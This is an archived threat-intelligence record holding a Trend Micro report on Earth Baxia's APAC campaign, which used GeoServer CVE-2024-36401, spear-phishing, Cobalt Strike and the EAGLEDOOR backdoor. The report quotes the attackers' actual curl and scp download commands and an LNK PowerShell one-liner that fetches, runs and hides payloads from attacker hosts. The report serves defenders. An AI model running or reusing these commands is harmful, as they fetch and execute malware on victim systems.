{
	"id": "d9da2d74-c6ae-4f40-b76f-e87e7120f575",
	"created_at": "2026-04-06T00:16:45.421449Z",
	"updated_at": "2026-04-10T03:32:45.911495Z",
	"deleted_at": null,
	"sha1_hash": "48662a307345cd5482cf7d8bfe048c1aeba86a41",
	"title": "Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 6042245,
	"plain_text": "Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC\r\nPublished: 2024-09-19 · Archived: 2026-04-02 11:07:36 UTC\r\nAPT \u0026 Targeted Attacks\r\nWe observed Earth Baxia carrying out targeted attacks against APAC countries that involved advanced techniques like spear-phishing and customized malware, with data suggesting that the group operates from China.\r\nBy: Ted Lee, Cyris Tseng, Pierre Lee, Sunny Lu, Philip Chen Sep 19, 2024 Read time: 8 min (2227 words)\r\nSummary\r\nThreat actor Earth Baxia has targeted a government organization in Taiwan – and potentially other countries in the Asia-Pacific (APAC) region – using spear-phishing emails and the GeoServer vulnerability CVE-2024-36401.\r\nCVE-2024-36401 is a remote code execution vulnerability whose exploitation allowed the threat actors to download or copy malicious components.\r\nThe threat actor employs GrimResource and AppDomainManager injection to deploy additional payloads, aiming to lower the victim’s guard.\r\nCustomized Cobalt Strike components were deployed on compromised machines through the two initial access vectors. The altered version of Cobalt Strike included modified internal signatures and a changed configuration structure for evasion.\r\nEarth Baxia also used a new backdoor named EAGLEDOOR, which supports multiple communication protocols for information gathering and payload delivery.\r\nIn July, we observed suspicious activity targeting a government organization in Taiwan, with other APAC countries also likely targeted, attributed to the threat actor Earth Baxia. In these campaigns, Earth Baxia used spear-phishing emails and exploited CVE-2024-36401, a vulnerability in GeoServer, an open-source server for sharing geospatial data, as initial access vectors, deploying customized Cobalt Strike components on compromised machines. 
Additionally, we identified a new backdoor called EAGLEDOOR that supports multiple protocols. In this report, we will discuss their infection chain and provide a detailed analysis of the malware involved.\r\nAttribution and victimology\r\nUpon investigation, we discovered that multiple servers were hosted on the Alibaba cloud service or located in Hong Kong, and some related samples were submitted to VirusTotal from China. After checking one of the Cobalt Strike watermarks (666666) used by the threat actors on Shodan, we also found that only a few machines were linked to this watermark, most of which were in China (Table 1). Therefore, we suspect that the APT group behind these campaigns originates from China.\r\nhttps://www.trendmicro.com/en_us/research/24/i/earth-baxia-spear-phishing-and-geoserver-exploit.html\r\nPage 1 of 10\r\nCountry Number of machines\r\nChina 13\r\nJapan 1\r\nSingapore 1\r\nTable 1. Machines linked to the Cobalt Strike watermark 666666\r\nBased on the collected phishing emails, decoy documents, and observations from incidents, it appears that the targets are primarily government agencies, telecommunication businesses, and the energy industry in the Philippines, South Korea, Vietnam, Taiwan, and Thailand (Figure 1). Notably, we also discovered a decoy document written in simplified Chinese, suggesting that China is also one of the impacted countries. 
However, due to limited information, we cannot accurately determine which sectors in China are affected.\r\nInfection chain\r\nIn this section, we will discuss the threat group’s attack flow as identified by our telemetry, including the malware and tactics, techniques, and procedures (TTPs) involved, as shown in Figure 2.\r\nInitial access\r\nVulnerable GeoServer\r\nIn some cases, Earth Baxia leveraged CVE-2024-36401, a remote code execution (RCE) vulnerability in GeoServer, to execute arbitrary commands. Our investigation revealed that they used commands like “curl” and “scp” to download or copy malicious components into the victim’s environment, and then executed these components using the RCE exploit (Table 2).\r\nThe file download via curl is as follows:\r\ncurl --connect-timeout 3 -m 10 -o c:\\windows\\temp\\{file name} http://167[.]172[.]89[.]142/{file name}\r\nThe remote file copy via scp is as follows:\r\ncmd /c \"scp -P 23 -o StrictHostKeyChecking=no -o ConnectTimeout=3 -o UserKnownHostsFile=C:\\windows\\temp\\ t1sc@152[.]42[.]243[.]170:/tmp/bd/{file name} c:\\windows\\temp\\\"\r\nFile name Description\r\nEdge.exe Legitimate executable used to load msedge.dll\r\nmsedge.dll Malicious loader (SWORDLDR) used to launch Cobalt Strike (Logs.txt)\r\nLogs.txt Customized Cobalt Strike shellcode\r\nTable 2. The malicious components downloaded by the RCE exploit\r\nSpear-phishing email vector\r\nIn early August, Earth Baxia began leveraging phishing emails to advance their attacks. One of the victims reported receiving over 70 phishing emails within approximately two weeks. We also identified similar email attachments on VirusTotal. 
Analysis of the decoy documents suggests that the attackers may have targeted not just Taiwan, but also Vietnam and China.\r\nMost of the email subjects are meticulously tailored with varying content; the attached ZIP file contains a decoy MSC file, which we named RIPCOY. At this stage, when the user double-clicks this file, the embedded obfuscated VBScript attempts to download multiple files from a public cloud service, typically Amazon Web Services (AWS), in a technique called GrimResource. These files include a decoy PDF document, .NET applications, and a configuration file.\r\nThe .NET applications and configuration file dropped by the MSC file then use a technique known as AppDomainManager injection, which allows the injection of a custom application domain to execute arbitrary code within the process of the target application. It enables any .NET application to load an arbitrary managed DLL, either locally or remotely from a website, without directly invoking any Windows API calls (Figure 3).\r\nFigure 3. The configuration file contains download sites loaded by the .NET framework application\r\nThe legitimate .NET applications then proceed to download the next-stage downloader based on the URL specified in the .config file, which points to a .NET DLL file (Figure 4). The URL for this download is obfuscated using Base64 and AES encryption. Most of the download sites identified at this stage were hosted on public cloud services, typically Aliyun. Once the DLL retrieves the shellcode, it executes it using the CreateThread API, with all processes running entirely in memory.\r\nFigure 4. 
The .NET DLL file contains a download site with obfuscated code\r\nThe shellcode gathers information from the affected machine, including the username, computer name, parent process (the legitimate .NET application), and memory status. It appends this information as a ‘client_id’ parameter to a URL and sends it to a custom domain. It may receive a 64-character response from the server, which is then used to request the next payload from the URL (Figure 5). However, we couldn’t receive the final payload.\r\nFigure 5. A screenshot of network traffic analysis from the VirusTotal sandbox\r\nThe shellcode exhibited several distinct features:\r\nThe attacker disguised the domain names to resemble public cloud services by using names like “s3cloud-azure” or “s2cloud-amazon”.\r\nEach network request followed a specific pattern, including a unique user-agent string and data formatted in JSON.\r\nThe final stage of the download process always had the path “/api/v1/homepage/”, suggesting that the file might still be hosted on a third-party cloud service.\r\nBy hosting files on the cloud, the attacker gains the advantage of easily replacing or updating files, including .config files with different download links, making it significantly more challenging for us to track their activities.\r\nAlthough we didn’t confirm what the final shellcode was, our telemetry did reveal that the “oncesvc.exe” launched by the MSC file would run another process, “Edge.exe”, to load the Cobalt Strike components msedge.dll and Logs.txt. In the next section, we discuss these components further.\r\nBackdoor analysis\r\nCobalt Strike\r\nEarth Baxia utilizes DLL side-loading to execute Cobalt Strike shellcode (Figure 6). 
To evade defenses, the shellcode loader, known as “SWORDLDR,” decrypts the payload and injects it into a specified process according to its embedded configuration (Figure 7).\r\nThe injected shellcode is a customized version of Cobalt Strike. Unlike the usual Cobalt Strike payload, the modified version’s MZ header has been removed and the internal signatures have been modified (Figure 8). Additionally, the configuration structure has also been slightly changed (Figure 9).\r\nFigure 8. Header differences between the usual (left) and modified (right) versions of Cobalt Strike\r\nFigure 9. Differences in configuration structures between the usual (left) and modified (right) versions of Cobalt Strike\r\nEAGLEDOOR\r\nOn the victim side, we collected these sample sets:\r\nSystemsetting.dll (EAGLEDOOR loader)\r\nSystemsetting.exe\r\nThese samples are components of EAGLEDOOR, which was dropped and launched by the Cobalt Strike process mentioned previously.\r\nThe threat actors apply DLL side-loading to start the loader and execute EAGLEDOOR in memory. In the loader, there are two DLL files encrypted in the .data section:\r\nHook.dll\r\nThis module hooks specific APIs through its export function, MyCreateHook, targeting APIs that are frequently called (Figure 10). Once a hooked API is called, the malicious module, Eagle.dll, will be executed.\r\nFigure 10. Loader applies hook.dll to hook the APIs GetProcAddress, FreeLibrary and LdrUnloadDll\r\nEagle.dll\r\nThe code flow of launching Eagle.dll is shown below. The loader decrypts this module and executes its first export function, “RunEagle”, in memory (Figure 11).
\r\nEAGLEDOOR supports four methods to communicate with a C\u0026C server:\r\nDNS\r\nHTTP\r\nTCP\r\nTelegram\r\nUpon analysis, the TCP, HTTP and DNS protocols are used to send the victim machine’s status to a C\u0026C server. The main backdoor functionality is achieved over the Telegram protocol through the Bot API, and the applied methods include:\r\ngetFile\r\ngetUpdates\r\nsendDocument\r\nsendMessage\r\nThese methods are effective for gathering information, delivering files, and executing the next payload on the victim's system. However, in this case, we only collected samples related to the TCP and HTTP protocols on the victim side. Therefore, we will keep monitoring the channel to track the threat actors' next steps in their Telegram communications.\r\nExfiltration\r\nBased on our investigation, we observed that Earth Baxia would archive the collected data and exfiltrate it using curl.exe. Figure 12 shows a case of data exfiltration to their file server (152[.]42[.]243[.]170) through curl.\r\nFurther observations\r\nMost phishing emails lure users with an attachment. However, based on our telemetry, some phishing emails are sent with a phishing link that downloads a ZIP file. So far, we know there are four combinations at the initial access stage, as shown in Figure 13. Both the MSC file and the LNK file are able to deliver those two toolsets.\r\nWhile investigating the case, we came across the download site static[.]krislab[.]site in an LNK file. It executes a PowerShell command to download decoy documents and Cobalt Strike toolsets, which include Edge.exe, msedge.dll, and Logs.txt (Table 3). 
This toolset is similar to the one we mentioned earlier in this blog entry.\r\nEach ZIP file contains an LNK file with the target PowerShell command:\r\nwget -Uri https://static.krislab.site/infodata/msedge.dll -OutFile C:\\Users\\Public\\msedge.dll; wget -Uri https://static.krislab.site/infodata/Logs.txt -OutFile C:\\Users\\Public\\Logs.txt;wget -Uri https://static.krislab.site/infodata/Edge.exe -OutFile C:\\Users\\Public\\Edge.exe;C:\\Users\\Public\\Edge.exe;wget -Uri \"https://static.krislab.site/infodata/yn.pdf\" -OutFile \"C:\\Users\\Public\\邀請函.pdf\";C:\\Windows\\System32\\cmd.exe /c start /b \"C:\\Users\\Public\\邀請函.pdf\";attrib +s +h C:\\Users\\Public\\Edge.exe;attrib +s +h C:\\Users\\Public\\Logs.txt;attrib +s +h C:\\Users\\Public\\msedge.dll\r\nDiscovered Date Path File description\r\nJune 21, 2024 /infodata/Invitation1017.zip Cobalt Strike tool set\r\nJune 21, 2024 /infodata/Edge.exe Cobalt Strike tool set\r\nJune 21, 2024 /infodata/msedge.dll Cobalt Strike tool set\r\nJune 21, 2024 /infodata/Logs.txt Cobalt Strike tool set\r\nJune 21, 2024 /infodata/tw.pdf Decoy document\r\nJune 25, 2024 /infodata/break_1/06.pdf Decoy document\r\nJune 30, 2024 /infodata/Invitation0630.zip Cobalt Strike tool set\r\nJune 30, 2024 /infodata/Edge.exe Cobalt Strike tool set\r\nJune 30, 2024 /infodata/msedge.dll Cobalt Strike tool set\r\nJune 30, 2024 /infodata/Logs.txt Cobalt Strike tool set\r\nJune 30, 2024 /infodata/yn.pdf Decoy document\r\nJuly 2, 2024 /infodata/Invitation0702.zip Cobalt Strike tool set\r\nJuly 2, 2024 /infodata/Edge.exe Cobalt Strike tool set\r\nJuly 2, 2024 /infodata/msedge.dll Cobalt Strike tool set\r\nJuly 2, 2024 /infodata/Logs.txt Cobalt Strike tool set\r\nJuly 2, 2024 /infodata/hzm.pdf Decoy document\r\nAugust 15, 2024 /infodata/Edge.exe Cobalt Strike tool set\r\nAugust 15, 2024 /infodata/msedge.dll Cobalt Strike tool set\r\nAugust 15, 2024 /infodata/Logs.txt Cobalt Strike tool set\r\nAugust 15, 2024 /infodata/k1.pdf Decoy document\r\nTable 3. Files hosted on static[.]krislab[.]site\r\nTrend Micro Vision One Threat Intelligence\r\nTo stay ahead of evolving threats, Trend Micro customers can access a range of Intelligence Reports and Threat Insights within Trend Micro Vision One. 
Threat Insights helps customers stay ahead of cyber threats before they happen and be better prepared for emerging threats. It offers comprehensive information on threat actors, their malicious activities, and the techniques they use. By leveraging this intelligence, customers can take proactive steps to protect their environments, mitigate risks, and respond effectively to threats.\r\nTrend Micro Vision One Intelligence Reports App [IOC Sweeping]\r\nEarth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC\r\nEarth Baxia: A dive into their aggressive campaign in August\r\nTrend Micro Vision One Threat Insights App\r\nThreat Actor: Earth Baxia\r\nEmerging Threats: Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC\r\nHunting Queries\r\nTrend Micro Vision One Search App\r\nVision One customers can use the Search App to match or hunt the malicious indicators mentioned in this blog post with data in their environment.\r\nNetwork Communication with Earth Baxia - IP\r\neventId:3 AND (src:\"167.172.89.142\" OR src:\"167.172.84.142\" OR src:\"152.42.243.170\" OR src:\"188.166.252.85\" OR dst:\"167.172.89.142\" OR dst:\"167.172.84.142\" OR dst:\"152.42.243.170\" OR dst:\"188.166.252.85\")\r\nMore hunting queries are available for Vision One customers with Threat Insights Entitlement enabled.\r\nConclusion\r\nEarth Baxia, likely based in China, conducted a sophisticated campaign targeting government and energy sectors in multiple APAC countries. They used advanced techniques like GeoServer exploitation, spear-phishing, and customized malware (Cobalt Strike and EAGLEDOOR) to infiltrate and exfiltrate data. 
The use of public cloud services for hosting malicious files and the multi-protocol support of EAGLEDOOR highlight the complexity and adaptability of their operations.\r\nContinued vigilance and advanced threat detection measures are essential to counter such threats. To mitigate the risk of this kind of threat, security teams can also implement the following best practices:\r\nImplement continuous phishing awareness training for employees.\r\nDouble-check the sender and subject of emails, particularly those from unfamiliar sources or with vague subjects.\r\nDeploy multi-layered protection solutions to help detect and block threats early in the malware infection chain.\r\nOrganizations can help protect themselves from these kinds of attacks with Trend Vision One™, which enables security teams to continuously identify attack surfaces, including known, unknown, managed, and unmanaged cyber assets. Vision One helps organizations prioritize and address potential risks, including vulnerabilities. It considers critical factors such as the likelihood and impact of potential attacks and offers a range of prevention, detection, and response capabilities. The multilayered protection and behavior detection Vision One offers can help block malicious tools and services before they can inflict damage on user machines and systems.\r\nIndicators of Compromise (IOCs)\r\nThe full list of IOCs can be found here.\r\nIoCs changed on July 9, 2025 to correct attribution of certain entries.\r\nSource: https://www.trendmicro.com/en_us/research/24/i/earth-baxia-spear-phishing-and-geoserver-exploit.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/24/i/earth-baxia-spear-phishing-and-geoserver-exploit.html"
	],
	"report_names": [
		"earth-baxia-spear-phishing-and-geoserver-exploit.html"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "f45af9e4-5037-4a5a-82c1-4627845eea49",
			"created_at": "2024-09-26T02:00:04.286721Z",
			"updated_at": "2026-04-10T02:00:03.707415Z",
			"deleted_at": null,
			"main_name": "Earth Baxia",
			"aliases": [],
			"source_name": "MISPGALAXY:Earth Baxia",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "4b7f4f69-7c56-4691-9071-9365884a7f30",
			"created_at": "2024-10-25T02:02:07.672671Z",
			"updated_at": "2026-04-10T02:00:04.660715Z",
			"deleted_at": null,
			"main_name": "Earth Baxia",
			"aliases": [],
			"source_name": "ETDA:Earth Baxia",
			"tools": [
				"Agentemis",
				"Cobalt Strike",
				"CobaltStrike",
				"EAGLEDOOR",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "3fff98c9-ad02-401d-9d4b-f78b5b634f31",
			"created_at": "2023-01-06T13:46:38.376868Z",
			"updated_at": "2026-04-10T02:00:02.949077Z",
			"deleted_at": null,
			"main_name": "Cleaver",
			"aliases": [
				"G0003",
				"Operation Cleaver",
				"Op Cleaver",
				"Tarh Andishan",
				"Alibaba",
				"TG-2889",
				"Cobalt Gypsy"
			],
			"source_name": "MISPGALAXY:Cleaver",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434605,
	"ts_updated_at": 1775791965,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/48662a307345cd5482cf7d8bfe048c1aeba86a41.pdf",
		"text": "https://archive.orkl.eu/48662a307345cd5482cf7d8bfe048c1aeba86a41.txt",
		"img": "https://archive.orkl.eu/48662a307345cd5482cf7d8bfe048c1aeba86a41.jpg"
	}
}